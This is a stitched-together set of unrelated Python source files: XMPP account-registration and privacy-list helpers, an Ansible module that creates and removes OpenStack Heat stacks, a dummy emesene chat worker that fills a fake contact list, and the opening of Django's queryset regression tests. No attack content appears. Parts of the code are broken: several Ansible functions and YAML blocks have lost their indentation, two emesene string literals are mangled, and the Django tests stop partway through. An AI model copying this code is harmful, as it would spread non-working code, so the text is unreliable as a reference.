def getRegInfo(disp,host,info={},sync=True):
    """ Gets registration form from remote host.
        You can pre-fill the info dictionary.
        F.e. if you are requesting info on registering user joey than specify
        info as {'username':'joey'}. See JEP-0077 for details.
        'disp' must be connected dispatcher instance."""
    # NOTE(review): mutable default argument `info={}` is shared across
    # calls; safe only as long as callers never mutate it.
    iq=Iq('get',NS_REGISTER,to=host)
    for i in info.keys(): iq.setTagData(i,info[i])
    if sync:
        resp=disp.SendAndWaitForResponse(iq)
        _ReceivedRegInfo(disp.Dispatcher,resp, host)
        return resp
    else: disp.SendAndCallForResponse(iq,_ReceivedRegInfo, {'agent': host})
def _ReceivedRegInfo(con, resp, agent):
    """Handle a registration-info response: emit REGISTER_DATA_RECEIVED with
    the embedded x-data form, or with a form rebuilt from legacy fields."""
    iq=Iq('get',NS_REGISTER,to=agent)
    if not isResultNode(resp): return
    df=resp.getTag('query',namespace=NS_REGISTER).getTag('x',namespace=NS_DATA)
    if df:
        con.Event(NS_REGISTER,REGISTER_DATA_RECEIVED,(agent, DataForm(node=df)))
        return
    df=DataForm(typ='form')
    for i in resp.getQueryPayload():
        # `<>` is the Python 2 inequality operator: this module is py2-only.
        if type(i)<>type(iq): pass
        elif i.getName()=='instructions': df.addInstructions(i.getData())
        else: df.setField(i.getName()).setValue(i.getData())
    con.Event(NS_REGISTER,REGISTER_DATA_RECEIVED,(agent, df))
def register(disp, host, info):
    """ Perform registration on remote server with provided info.
        disp must be a connected dispatcher instance.
        Returns 1 on success, None otherwise.
        If registration fails you can get additional info from the dispatcher's
        owner attributes lastErrNode, lastErr and lastErrCode.
    """
    iq = Iq('set', NS_REGISTER, to=host)
    # `info` may be a DataForm-like object; normalise it to a plain dict.
    # (The original used the deprecated Py2-only `type(info)<>type({})` test.)
    if not isinstance(info, dict):
        info = info.asDict()
    for field in info.keys():
        iq.setTag('query').setTagData(field, info[field])
    resp = disp.SendAndWaitForResponse(iq)
    if isResultNode(resp):
        return 1
def unregister(disp, host):
    """ Unregisters with host (permanently removes account).
        disp must be a connected and authorized dispatcher instance.
        Returns true on success."""
    request = Iq('set', NS_REGISTER, to=host, payload=[Node('remove')])
    response = disp.SendAndWaitForResponse(request)
    if isResultNode(response):
        return 1
def changePasswordTo(disp, newpassword, host=None):
    """ Changes password on specified or current (if not specified) server.
        disp must be a connected and authorized dispatcher instance.
        Returns true on success."""
    if not host:
        host = disp._owner.Server
    # Per XEP-0077 the <username/> element must carry the account's username.
    # The original code sent disp._owner.Server (the server host name) here,
    # which makes the password-change request target the wrong account name.
    payload = [Node('username', payload=[disp._owner.User]),
               Node('password', payload=[newpassword])]
    resp = disp.SendAndWaitForResponse(Iq('set', NS_REGISTER, to=host,
                                          payload=payload))
    if isResultNode(resp):
        return 1
### Privacy ### jabber:iq:privacy ### draft-ietf-xmpp-im-19 ####################
#type=[jid|group|subscription]
#action=[allow|deny]
def getPrivacyLists(disp):
    """ Requests privacy lists from connected server.
        Returns a dictionary of existing lists on success:
        {'lists': [name, ...], 'active': name?, 'default': name?}."""
    try:
        # Renamed from `dict`/`list`, which shadowed the builtins.
        lists = {'lists': []}
        resp = disp.SendAndWaitForResponse(Iq('get', NS_PRIVACY))
        if not isResultNode(resp):
            return
        for node in resp.getQueryPayload():
            if node.getName() == 'list':
                lists['lists'].append(node.getAttr('name'))
            else:
                # <active/> and <default/> markers keyed by their tag name.
                lists[node.getName()] = node.getAttr('name')
        return lists
    # Broad except preserved from the original best-effort contract:
    # any failure simply yields None.
    except:
        pass
def getPrivacyList(disp, listname):
    """ Requests specific privacy list `listname`. Returns the list of XML
        nodes (rules) taken from the server response, or None on failure."""
    try:
        request = Iq('get', NS_PRIVACY,
                     payload=[Node('list', {'name': listname})])
        answer = disp.SendAndWaitForResponse(request)
        if isResultNode(answer):
            return answer.getQueryPayload()[0]
    except:
        pass
def setActivePrivacyList(disp, listname=None, typ='active'):
    """ Switches privacy list `listname` to the specified type.
        By default the type is 'active'. Returns true on success."""
    attrs = {'name': listname} if listname else {}
    marker = Node(typ, attrs)
    resp = disp.SendAndWaitForResponse(Iq('set', NS_PRIVACY, payload=[marker]))
    if isResultNode(resp):
        return 1
def setDefaultPrivacyList(disp, listname=None):
    """ Sets the default privacy list to `listname`. Returns true on success."""
    # Making a list the default is just an activation with a different element.
    return setActivePrivacyList(disp, listname, typ='default')
def setPrivacyList(disp, list):
    """ Set the ruleset. `list` should be the simpleXML node formatted
        according to RFC 3921 (XMPP-IM),
        i.e. Node('list', {'name': listname}, payload=[...]).
        Returns true on success."""
    # (Parameter name `list` shadows the builtin but is part of the public
    # keyword interface, so it is kept as-is.)
    request = Iq('set', NS_PRIVACY, payload=[list])
    resp = disp.SendAndWaitForResponse(request)
    if isResultNode(resp):
        return 1
def delPrivacyList(disp, listname):
    """ Deletes privacy list `listname`. Returns true on success."""
    # An empty <list name='...'/> in a set stanza removes the list.
    removal = Node('list', {'name': listname})
    resp = disp.SendAndWaitForResponse(Iq('set', NS_PRIVACY, payload=[removal]))
    if isResultNode(resp):
        return 1
| gpl-3.0 |
StephenWeber/ansible | lib/ansible/modules/cloud/openstack/os_stack.py | 15 | 9214 | #!/usr/bin/python
#coding: utf-8 -*-
# (c) 2016, Mathieu Bultel <mbultel@redhat.com>
# (c) 2016, Steve Baker <sbaker@redhat.com>
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
# Module release metadata consumed by Ansible's documentation tooling.
ANSIBLE_METADATA = {
    'status': ['preview'],
    'supported_by': 'community',
    'version': '1.0',
}
# User-facing module documentation (YAML). Fixes the 'compatability' typo.
DOCUMENTATION = '''
---
module: os_stack
short_description: Add/Remove Heat Stack
extends_documentation_fragment: openstack
version_added: "2.2"
author: "Mathieu Bultel (matbu), Steve Baker (steveb)"
description:
    - Add or Remove a Stack to an OpenStack Heat
options:
    state:
      description:
        - Indicate desired state of the resource
      choices: ['present', 'absent']
      required: false
      default: present
    name:
      description:
        - Name of the stack that should be created, name could be char and digit, no space
      required: true
    template:
      description:
        - Path of the template file to use for the stack creation
      required: false
      default: None
    environment:
      description:
        - List of environment files that should be used for the stack creation
      required: false
      default: None
    parameters:
      description:
        - Dictionary of parameters for the stack creation
      required: false
      default: None
    rollback:
      description:
        - Rollback stack creation
      required: false
      default: false
    timeout:
      description:
        - Maximum number of seconds to wait for the stack creation
      required: false
      default: 3600
    availability_zone:
      description:
        - Ignored. Present for backwards compatibility
      required: false
requirements:
    - "python >= 2.6"
    - "shade"
'''
EXAMPLES = '''
---
- name: create stack
ignore_errors: True
register: stack_create
os_stack:
name: "{{ stack_name }}"
state: present
template: "/path/to/my_stack.yaml"
environment:
- /path/to/resource-registry.yaml
- /path/to/environment.yaml
parameters:
bmc_flavor: m1.medium
bmc_image: CentOS
key_name: default
private_net: "{{ private_net_param }}"
node_count: 2
name: undercloud
image: CentOS
my_flavor: m1.large
external_net: "{{ external_net_param }}"
'''
RETURN = '''
id:
description: Stack ID.
type: string
sample: "97a3f543-8136-4570-920e-fd7605c989d6"
stack:
action:
description: Action, could be Create or Update.
type: string
sample: "CREATE"
creation_time:
description: Time when the action has been made.
type: string
sample: "2016-07-05T17:38:12Z"
description:
description: Description of the Stack provided in the heat template.
type: string
sample: "HOT template to create a new instance and networks"
id:
description: Stack ID.
type: string
sample: "97a3f543-8136-4570-920e-fd7605c989d6"
name:
description: Name of the Stack
type: string
sample: "test-stack"
identifier:
description: Identifier of the current Stack action.
type: string
sample: "test-stack/97a3f543-8136-4570-920e-fd7605c989d6"
links:
description: Links to the current Stack.
type: list of dict
sample: "[{'href': 'http://foo:8004/v1/7f6a/stacks/test-stack/97a3f543-8136-4570-920e-fd7605c989d6']"
outputs:
description: Output returned by the Stack.
type: list of dict
sample: "{'description': 'IP address of server1 in private network',
'output_key': 'server1_private_ip',
'output_value': '10.1.10.103'}"
parameters:
description: Parameters of the current Stack
type: dict
sample: "{'OS::project_id': '7f6a3a3e01164a4eb4eecb2ab7742101',
'OS::stack_id': '97a3f543-8136-4570-920e-fd7605c989d6',
'OS::stack_name': 'test-stack',
'stack_status': 'CREATE_COMPLETE',
'stack_status_reason': 'Stack CREATE completed successfully',
'status': 'COMPLETE',
'template_description': 'HOT template to create a new instance and networks',
'timeout_mins': 60,
'updated_time': null}"
'''
from time import sleep
from distutils.version import StrictVersion
try:
    import shade
    HAS_SHADE = True
except ImportError:
    # shade is optional at import time; its presence (and minimum version)
    # is enforced in main() so a clean error message can be returned.
    HAS_SHADE = False
def _create_stack(module, stack, cloud):
try:
stack = cloud.create_stack(module.params['name'],
template_file=module.params['template'],
environment_files=module.params['environment'],
timeout=module.params['timeout'],
wait=True,
rollback=module.params['rollback'],
**module.params['parameters'])
stack = cloud.get_stack(stack.id, None)
if stack.stack_status == 'CREATE_COMPLETE':
return stack
else:
return False
module.fail_json(msg = "Failure in creating stack: ".format(stack))
except shade.OpenStackCloudException as e:
module.fail_json(msg=str(e))
def _update_stack(module, stack, cloud):
    # Update an existing Heat stack and wait for completion.  Returns the
    # updated stack dict on UPDATE_COMPLETE; otherwise fails the module
    # (fail_json exits), including the stack's status reason.
    try:
        stack = cloud.update_stack(
            module.params['name'],
            template_file=module.params['template'],
            environment_files=module.params['environment'],
            timeout=module.params['timeout'],
            rollback=module.params['rollback'],
            # 'wait' is not in this module's argument_spec; presumably it is
            # provided by openstack_full_argument_spec -- verify.
            wait=module.params['wait'],
            **module.params['parameters'])
        if stack['stack_status'] == 'UPDATE_COMPLETE':
            return stack
        else:
            module.fail_json(msg = "Failure in updating stack: %s" %
                             stack['stack_status_reason'])
    except shade.OpenStackCloudException as e:
        module.fail_json(msg=str(e))
def _system_state_change(module, stack, cloud):
state = module.params['state']
if state == 'present':
if not stack:
return True
if state == 'absent' and stack:
return True
return False
def main():
    # Module entry point: validate parameters, then create/update/delete the
    # named Heat stack according to `state`.
    argument_spec = openstack_full_argument_spec(
        name=dict(required=True),
        template=dict(default=None),
        environment=dict(default=None, type='list'),
        parameters=dict(default={}, type='dict'),
        rollback=dict(default=False, type='bool'),
        timeout=dict(default=3600, type='int'),
        state=dict(default='present', choices=['absent', 'present']),
    )
    module_kwargs = openstack_module_kwargs()
    module = AnsibleModule(argument_spec,
                           supports_check_mode=True,
                           **module_kwargs)
    # stack API introduced in 1.8.0
    if not HAS_SHADE or (StrictVersion(shade.__version__) < StrictVersion('1.8.0')):
        module.fail_json(msg='shade 1.8.0 or higher is required for this module')
    state = module.params['state']
    name = module.params['name']
    # Check for required parameters when state == 'present'
    if state == 'present':
        for p in ['template']:
            if not module.params[p]:
                module.fail_json(msg='%s required with present state' % p)
    try:
        cloud = shade.openstack_cloud(**module.params)
        stack = cloud.get_stack(name)
        # In check mode only report whether a change would happen.
        if module.check_mode:
            module.exit_json(changed=_system_state_change(module, stack,
                                                          cloud))
        if state == 'present':
            # Create when absent, otherwise update in place; both helpers
            # call fail_json (and exit) on failure.
            if not stack:
                stack = _create_stack(module, stack, cloud)
            else:
                stack = _update_stack(module, stack, cloud)
            changed = True
            module.exit_json(changed=changed,
                             stack=stack,
                             id=stack.id)
        elif state == 'absent':
            if not stack:
                changed = False
            else:
                changed = True
                if not cloud.delete_stack(name, wait=module.params['wait']):
                    module.fail_json(msg='delete stack failed for stack: %s' % name)
            module.exit_json(changed=changed)
    except shade.OpenStackCloudException as e:
        module.fail_json(msg=str(e))
# Bottom-of-file wildcard imports follow the legacy Ansible module convention:
# module_utils are inlined into the module payload at execution time.
from ansible.module_utils.basic import *
from ansible.module_utils.openstack import *
if __name__ == '__main__':
    main()
| gpl-3.0 |
tiancj/emesene | emesene/e3/dummy/Worker.py | 1 | 13811 | # -*- coding: utf-8 -*-
import Queue
import random
import e3
import gobject
import time
import logging
log = logging.getLogger('dummy.Worker')
class Worker(e3.Worker):
    '''dummy Worker implementation to make it easy to test emesene'''
    def __init__(self, session, proxy, use_http=False, use_ipv6=False):
        '''class constructor'''
        # proxy/use_http/use_ipv6 are accepted for signature compatibility
        # with real workers but ignored by this dummy backend.
        e3.Worker.__init__(self, session)
    def _fill_contact_list(self):
        """
        method to fill the contact list with something
        """
        self._add_contact('dx@emesene.org', 'XD', e3.status.ONLINE, '', False)
        self._add_contact('roger@emesene.org', 'r0x0r', e3.status.ONLINE,
            '', False)
        self._add_contact('boyska@emesene.org', 'boyska', e3.status.ONLINE,
            '', True)
        self._add_contact('pochu@emesene.org', '<3 debian', e3.status.BUSY,
            '', False)
        self._add_contact('cloud@emesene.org', 'nube', e3.status.BUSY,
            '', False)
        self._add_contact('otacon@emesene.org', 'Otacon', e3.status.BUSY,
            '', True)
        self._add_contact('federico@emesene.org', 'federico..', e3.status.AWAY,
            'he loves guiness', False)
        self._add_contact('respawner@emesene.org', 'Respawner', e3.status.AWAY,
            '', False)
        self._add_contact('mohrtutchy@emesene.org', 'moh..', e3.status.AWAY,
            'one love', True)
        self._add_contact('nassty@emesene.org', 'nassto', e3.status.IDLE,
            '', False)
        self._add_contact('j0hn@emesene.org', 'juan', e3.status.IDLE, '', False)
        self._add_contact('c0n0@emesene.org', 'conoconocono', e3.status.IDLE,
            '', True)
        self._add_contact('warlo@emesene.org', 'warlo', e3.status.OFFLINE,
            '', False)
        self._add_contact('wariano@emesene.org', 'wariano', e3.status.OFFLINE,
            '', False)
        self._add_contact('Faith_Nahn@emesene.org', 'Gtk styler',
            e3.status.BUSY, '', False)
        self._add_contact('you@emesene.org', 'I\'m on emesene code!',
            e3.status.OFFLINE, '', True)
        # The nicks below exercise the MSN formatting-code parser
        # ([b], [c=..], ·$.. colour codes) and unicode handling.
        self._add_contact('one@hotmail.com', '- [b][c=48]Pαrκ¡[/c=30][/b]',
            e3.status.BUSY, '', False)
        self._add_contact('two@hotmail.com',
            '[c=46]-๑๑test_test๑๑-[/c=2]', e3.status.BUSY, '', False)
        self._add_contact('three@hotmail.com',
            '[c=29]•°o.Orandom εïз stuff O.o°•[/c=36]·$28',
            e3.status.BUSY, '', False)
        self._add_contact('four@hotmail.com',
            '[c=48][b]hy[/b][/c=11] ·#·$3,3\'_·$#fcfcfc,#fcfcfc\'_·$4,4\'_·0·$28',
            e3.status.ONLINE, '', False)
        self._add_contact('five@hotmail.com',
            '·&·#·$9X.|̲̅·$10X·$9̲̅·$10x·$9̲̅·$10x·$9̲̅·$10x·$9̲̅·$10x·$9̲̅|·$10·#',
            e3.status.BUSY, '', False)
        self._add_contact('six@hotmail.com', '[c=46][u][b]xafd! [/b][/u][/c]',
            e3.status.BUSY, '', False)
        self._add_contact('seven@hotmail.com',
            '[c=5]((_...sdsdf..._))..)_<(_))(°.°)(...][/c=48][u][/u]',
            e3.status.BUSY, '', False)
        self._add_contact('eight@hotmail.com',
            '[i][B][C=12]☆[/C=0][C=0]☆[/C=12][c=12]☆[/c=0] (W) [C=12]Bellamezz[/c=49] (F) [c=0]☆[/c=0][c=12]☆[/c=12][c=0]☆[/c=0][/B][/i]',
            e3.status.AWAY, '', False)
        self._add_contact('nine@hotmail.com',
            '[b](*) ... [c=12]Ricky[/c=33] ...(*)[/b]',
            e3.status.BUSY, '', False)
        self._add_contact('ten@hotmail.com',
            '<:o)[c=yellow]Yellow:DYellow[/c][c=red]Red[c=blue]Blue:)Blue[c=green]Green[/c][/c][/c]',
            e3.status.BUSY, '', False)
        self._add_contact('eleven@hotmail.com',
            '·$,32·$59«·$,41·$50«·$,50·$41«·$,59·$32«·$,66·$23«·$32,1« :: nube ::»·$,66·$23»·$,59·$32»·$,50·$41»·$,41·$50»·$,32·$59»·0 ·$0',
            e3.status.AWAY, '', False)
        self._add_contact('twelve@hotmail.com',
            '·$4Red·$11Aqua·$6,8PurpleOnYellow·$14GrayOnYellow·0Black·$9Lime',
            e3.status.BUSY, '', False)
        self._add_contact('thirteen@hotmail.com',
            '[c=7][b][I am][/c=yellow][/b][c=70][/c=89][c=89] so [A]wesome that [I] only use invalid tags [/c]',
            e3.status.ONLINE, '', False,
            '[ I am ] so [ A ]wesome that [ I ] only use invalid tags ')
        # NOTE(review): the two literals in the next two calls appear mangled
        # (unbalanced quotes/escapes) -- likely corrupted in transit; confirm
        # against upstream emesene before relying on this file.
        self._add_contact('fourteen@hotmail.com',
            '")':)(H);)"\')',
            e3.status.BUSY, '', False,
            '\")'(emo)(emo)(emo)"\')')
        self._add_contact('fifteen@hotmail.com',
            '1:)2;)3\')4\')5;)6:)7',
            e3.status.BUSY, '', False,
            '1(emo)2(emo)3(emo)4(emo)5(emo)6(emo)7')
        self._add_contact('sixteen@hotmail.com',
            '[C=80][i][b][I][/b]Single i[/i][/c=30][b][/C]Single /C[/B]',
            e3.status.OFFLINE, '', False,
            '[ i ]Single i[ /C ]Single /C')
        self._add_contact('seventeen@hotmail.com',
            '[/c][c=48][c=12][b]Colorful nickname[/b][/c=50]',
            e3.status.OFFLINE, '', False,
            '[ /c ][ c=48 ]Colorful nickname')
        self._add_group('ninjas')
        self._add_group('pirätes')
        self._add_group('lulz')
        self._add_group('code quiz ninjas')
        self._add_group('empty')
        self._add_group('strange nicks')
        self._add_contact_to_group('you@emesene.org', 'pirätes')
        self._add_contact_to_group('boyska@emesene.org', 'pirätes')
        self._add_contact_to_group('j0hn@emesene.org', 'pirätes')
        self._add_contact_to_group('c0n0@emesene.org', 'pirätes')
        self._add_contact_to_group('nassty@emesene.org', 'lulz')
        self._add_contact_to_group('warlo@emesene.org', 'lulz')
        self._add_contact_to_group('you@emesene.org', 'lulz')
        self._add_contact_to_group('cloud@emesene.org', 'lulz')
        self._add_contact_to_group('dx@emesene.org', 'ninjas')
        self._add_contact_to_group('roger@emesene.org', 'ninjas')
        self._add_contact_to_group('c0n0@emesene.org', 'ninjas')
        self._add_contact_to_group('boyska@emesene.org', 'ninjas')
        self._add_contact_to_group('Faith_Nahn@emesene.org', 'code quiz ninjas')
        self._add_contact_to_group('one@hotmail.com', 'strange nicks')
        self._add_contact_to_group('two@hotmail.com', 'strange nicks')
        self._add_contact_to_group('three@hotmail.com', 'strange nicks')
        self._add_contact_to_group('four@hotmail.com', 'strange nicks')
        self._add_contact_to_group('five@hotmail.com', 'strange nicks')
        self._add_contact_to_group('six@hotmail.com', 'strange nicks')
        self._add_contact_to_group('seven@hotmail.com', 'strange nicks')
        self._add_contact_to_group('eight@hotmail.com', 'strange nicks')
        self._add_contact_to_group('nine@hotmail.com', 'strange nicks')
        self._add_contact_to_group('ten@hotmail.com', 'strange nicks')
        self._add_contact_to_group('eleven@hotmail.com', 'strange nicks')
        self._add_contact_to_group('twelve@hotmail.com', 'strange nicks')
        self._add_contact_to_group('thirteen@hotmail.com', 'strange nicks')
        self._add_contact_to_group('fourteen@hotmail.com', 'strange nicks')
        self._add_contact_to_group('fifteen@hotmail.com', 'strange nicks')
        self._add_contact_to_group('sixteen@hotmail.com', 'strange nicks')
        #test pending contact dialog
        #self._add_pending_contacts()
    def _add_pending_contacts(self):
        # Seed two pending (awaiting-authorization) contacts for UI testing.
        tmp_cont = e3.base.Contact("test1@test.com", 1,
                                   "test1", "test1nick",
                                   e3.status.BUSY, '',
                                   True)
        self.session.contacts.pending["test1@test.com"] = tmp_cont
        tmp_cont = e3.base.Contact("test2@test.com", 2,
                                   "test2", "test2nick",
                                   e3.status.ONLINE, '',
                                   True)
        self.session.contacts.pending["test2@test.com"] = tmp_cont
    def _late_contact_add(self):
        '''this simulates adding a contact after we show the contactlist'''
        tmp_cont = e3.base.Contact("testlate1@test.com", 1,
                                   "testlate1", "testlate1nick",
                                   e3.status.BUSY, '',
                                   True)
        self.session.contacts.pending["testlate1@test.com"] = tmp_cont
        self.session.contact_added_you()
        # Returning False stops any gobject timeout that scheduled this.
        return False
    def _return_message(self, cid, account, message):
        ''' Method to return a message after some timeout '''
        self.session.conv_message(cid, account, message)
        message.account = account
        e3.Logger.log_message(self.session, None, message, False)
        # Returning False stops the gobject timeout that scheduled this.
        return False
    def _add_contact(self, mail, nick, status_, alias, blocked, msg="..."):
        """
        method to add a contact to the contact list
        """
        self.session.contacts.contacts[mail] = e3.Contact(mail, mail,
            nick, msg, status_, alias, blocked)
    def _add_group(self, name):
        """
        method to add a group to the contact list
        """
        self.session.groups[name] = e3.Group(name, name)
    def _add_contact_to_group(self, account, group):
        """
        method to add a contact to a group
        """
        # Membership is tracked on both sides (group and contact).
        self.session.groups[group].contacts.append(account)
        self.session.contacts.contacts[account].groups.append(group)
    # action handlers
    # Each handler immediately reports success back to the session -- this
    # dummy backend has no real server to talk to.
    def _handle_action_add_contact(self, account):
        '''handle Action.ACTION_ADD_CONTACT
        '''
        self.session.contact_add_succeed(account)
    def _handle_action_add_group(self, name):
        '''handle Action.ACTION_ADD_GROUP
        '''
        self.session.group_add_succeed(name)
    def _handle_action_add_to_group(self, account, gid):
        '''handle Action.ACTION_ADD_TO_GROUP
        '''
        self.session.group_add_contact_succeed(gid, account)
    def _handle_action_block_contact(self, account):
        '''handle Action.ACTION_BLOCK_CONTACT
        '''
        self.session.contact_block_succeed(account)
    def _handle_action_unblock_contact(self, account):
        '''handle Action.ACTION_UNBLOCK_CONTACT
        '''
        self.session.contact_unblock_succeed(account)
    def _handle_action_change_status(self, status_):
        '''handle Action.ACTION_CHANGE_STATUS
        '''
        self.session.account.status = status_
        self.session.contacts.me.status = status_
        self.session.status_change_succeed(status_)
    def _handle_action_login(self, account, password, status_):
        '''handle Action.ACTION_LOGIN
        '''
        self.session.login_succeed()
        self.session.nick_change_succeed('dummy nick is dummy')
        self._fill_contact_list()
        self.session.contact_list_ready()
        #gobject.timeout_add_seconds(4, self._late_contact_add)
        #memleak checks
        from e3.base.Event import Event
        #self.session.add_event(Event.EVENT_DISCONNECTED,
        #        'CHECKING MEMLEAKS :D', 1)
    def _handle_action_logout(self):
        '''handle Action.ACTION_LOGOUT
        '''
    def _handle_action_move_to_group(self, account, src_gid, dest_gid):
        '''handle Action.ACTION_MOVE_TO_GROUP
        '''
        self.session.contact_move_succeed(account, src_gid, dest_gid)
    def _handle_action_remove_contact(self, account):
        '''handle Action.ACTION_REMOVE_CONTACT
        '''
        self.session.contact_remove_succeed(account)
    def _handle_action_reject_contact(self, account):
        '''handle Action.ACTION_REJECT_CONTACT
        '''
        self.session.contact_reject_succeed(account)
    def _handle_action_remove_from_group(self, account, gid):
        '''handle Action.ACTION_REMOVE_FROM_GROUP
        '''
        self.session.group_remove_contact_succeed(gid, account)
    def _handle_action_remove_group(self, gid):
        '''handle Action.ACTION_REMOVE_GROUP
        '''
        self.session.group_remove_succeed(gid)
    def _handle_action_rename_group(self, gid, name):
        '''handle Action.ACTION_RENAME_GROUP
        '''
        self.session.group_rename_succeed(gid, name)
    def _handle_action_set_contact_alias(self, account, alias):
        '''handle Action.ACTION_SET_CONTACT_ALIAS
        '''
        self.session.contact_alias_succeed(account)
    def _handle_action_set_message(self, message):
        '''handle Action.ACTION_SET_MESSAGE
        '''
        self.session.message_change_succeed(message)
    def _handle_action_set_nick(self, nick):
        '''handle Action.ACTION_SET_NICK
        '''
        self.session.nick_change_succeed(nick)
    def _handle_action_set_picture(self, picture_name):
        '''handle Action.ACTION_SET_PICTURE
        '''
        self.session.contacts.me.picture = picture_name
        self.session.picture_change_succeed(self.session.account.account,
                picture_name)
    def _handle_action_new_conversation(self, account, cid):
        '''handle Action.ACTION_NEW_CONVERSATION
        '''
        pass
    def _handle_action_close_conversation(self, cid):
        '''handle Action.ACTION_CLOSE_CONVERSATION
        '''
        pass
    def _handle_action_send_message(self, cid, message):
        '''handle Action.ACTION_SEND_MESSAGE
        cid is the conversation id, message is a Message object
        '''
        self.session.conv_message_send_succeed(cid, message)
        # Echo the message back from a random contact after one second to
        # simulate a reply.
        account = random.choice(self.session.contacts.contacts.keys())
        e3.Logger.log_message(self.session, [account], message, True)
        gobject.timeout_add_seconds(1, self._return_message, cid, account, message)
| gpl-3.0 |
HonzaKral/django | tests/queries/tests.py | 14 | 154710 | from __future__ import unicode_literals
import datetime
import pickle
import unittest
from collections import OrderedDict
from operator import attrgetter
from django.core.exceptions import FieldError
from django.db import DEFAULT_DB_ALIAS, connection
from django.db.models import F, Q, Count
from django.db.models.sql.constants import LOUTER
from django.db.models.sql.datastructures import EmptyResultSet
from django.db.models.sql.where import NothingNode, WhereNode
from django.test import TestCase, skipUnlessDBFeature
from django.test.utils import CaptureQueriesContext
from django.utils import six
from django.utils.six.moves import range
from .models import (
FK1, X, Annotation, Article, Author, BaseA, Book, CategoryItem,
CategoryRelationship, Celebrity, Channel, Chapter, Child, ChildObjectA,
Classroom, Company, Cover, CustomPk, CustomPkTag, Detail, DumbCategory,
Eaten, Employment, ExtraInfo, Fan, Food, Identifier, Individual, Item, Job,
JobResponsibilities, Join, LeafA, LeafB, LoopX, LoopZ, ManagedModel,
Member, ModelA, ModelB, ModelC, ModelD, MyObject, NamedCategory, Node,
Note, NullableName, Number, ObjectA, ObjectB, ObjectC, OneToOneCategory,
Order, OrderItem, Page, Paragraph, Person, Plaything, PointerA, Program,
ProxyCategory, ProxyObjectA, ProxyObjectB, Ranking, Related,
RelatedIndividual, RelatedObject, Report, ReservedName, Responsibility,
School, SharedConnection, SimpleCategory, SingleObject, SpecialCategory,
Staff, StaffUser, Student, Tag, Task, Ticket21203Child, Ticket21203Parent,
Ticket23605A, Ticket23605B, Ticket23605C, TvChef, Valid,
)
class BaseQuerysetTest(TestCase):
    def assertValueQuerysetEqual(self, qs, values):
        """Compare a queryset against raw values (no repr() transform)."""
        def identity(value):
            return value
        return self.assertQuerysetEqual(qs, values, transform=identity)
class Queries1Tests(BaseQuerysetTest):
    # Shared fixture: tags, notes, authors, items, reports and rankings used
    # by every test in this class.
    @classmethod
    def setUpTestData(cls):
        generic = NamedCategory.objects.create(name="Generic")
        cls.t1 = Tag.objects.create(name='t1', category=generic)
        cls.t2 = Tag.objects.create(name='t2', parent=cls.t1, category=generic)
        cls.t3 = Tag.objects.create(name='t3', parent=cls.t1)
        t4 = Tag.objects.create(name='t4', parent=cls.t3)
        cls.t5 = Tag.objects.create(name='t5', parent=cls.t3)
        cls.n1 = Note.objects.create(note='n1', misc='foo', id=1)
        n2 = Note.objects.create(note='n2', misc='bar', id=2)
        cls.n3 = Note.objects.create(note='n3', misc='foo', id=3)
        ann1 = Annotation.objects.create(name='a1', tag=cls.t1)
        ann1.notes.add(cls.n1)
        ann2 = Annotation.objects.create(name='a2', tag=t4)
        ann2.notes.add(n2, cls.n3)
        # Create these out of order so that sorting by 'id' will be different to sorting
        # by 'info'. Helps detect some problems later.
        cls.e2 = ExtraInfo.objects.create(info='e2', note=n2, value=41)
        e1 = ExtraInfo.objects.create(info='e1', note=cls.n1, value=42)
        cls.a1 = Author.objects.create(name='a1', num=1001, extra=e1)
        cls.a2 = Author.objects.create(name='a2', num=2002, extra=e1)
        a3 = Author.objects.create(name='a3', num=3003, extra=cls.e2)
        cls.a4 = Author.objects.create(name='a4', num=4004, extra=cls.e2)
        cls.time1 = datetime.datetime(2007, 12, 19, 22, 25, 0)
        cls.time2 = datetime.datetime(2007, 12, 19, 21, 0, 0)
        time3 = datetime.datetime(2007, 12, 20, 22, 25, 0)
        time4 = datetime.datetime(2007, 12, 20, 21, 0, 0)
        cls.i1 = Item.objects.create(name='one', created=cls.time1, modified=cls.time1, creator=cls.a1, note=cls.n3)
        # Direct assignment to a m2m manager -- pre-Django-1.10 style
        # (later Django requires .set()).
        cls.i1.tags = [cls.t1, cls.t2]
        cls.i2 = Item.objects.create(name='two', created=cls.time2, creator=cls.a2, note=n2)
        cls.i2.tags = [cls.t1, cls.t3]
        cls.i3 = Item.objects.create(name='three', created=time3, creator=cls.a2, note=cls.n3)
        i4 = Item.objects.create(name='four', created=time4, creator=cls.a4, note=cls.n3)
        i4.tags = [t4]
        cls.r1 = Report.objects.create(name='r1', creator=cls.a1)
        Report.objects.create(name='r2', creator=a3)
        Report.objects.create(name='r3')
        # Ordering by 'rank' gives us rank2, rank1, rank3. Ordering by the Meta.ordering
        # will be rank3, rank2, rank1.
        cls.rank1 = Ranking.objects.create(rank=2, author=cls.a2)
        Cover.objects.create(title="first", item=i4)
        Cover.objects.create(title="second", item=cls.i2)
    # Regression tests for subquery alias reuse and Q-object combination.
    def test_subquery_condition(self):
        qs1 = Tag.objects.filter(pk__lte=0)
        qs2 = Tag.objects.filter(parent__in=qs1)
        qs3 = Tag.objects.filter(parent__in=qs2)
        self.assertEqual(qs3.query.subq_aliases, {'T', 'U', 'V'})
        self.assertIn('v0', str(qs3.query).lower())
        qs4 = qs3.filter(parent__in=qs1)
        self.assertEqual(qs4.query.subq_aliases, {'T', 'U', 'V'})
        # It is possible to reuse U for the second subquery, no need to use W.
        self.assertNotIn('w0', str(qs4.query).lower())
        # So, 'U0."id"' is referenced twice.
        self.assertTrue(str(qs4.query).lower().count('u0'), 2)
    def test_ticket1050(self):
        self.assertQuerysetEqual(
            Item.objects.filter(tags__isnull=True),
            ['<Item: three>']
        )
        self.assertQuerysetEqual(
            Item.objects.filter(tags__id__isnull=True),
            ['<Item: three>']
        )
    def test_ticket1801(self):
        self.assertQuerysetEqual(
            Author.objects.filter(item=self.i2),
            ['<Author: a2>']
        )
        self.assertQuerysetEqual(
            Author.objects.filter(item=self.i3),
            ['<Author: a2>']
        )
        self.assertQuerysetEqual(
            Author.objects.filter(item=self.i2) & Author.objects.filter(item=self.i3),
            ['<Author: a2>']
        )
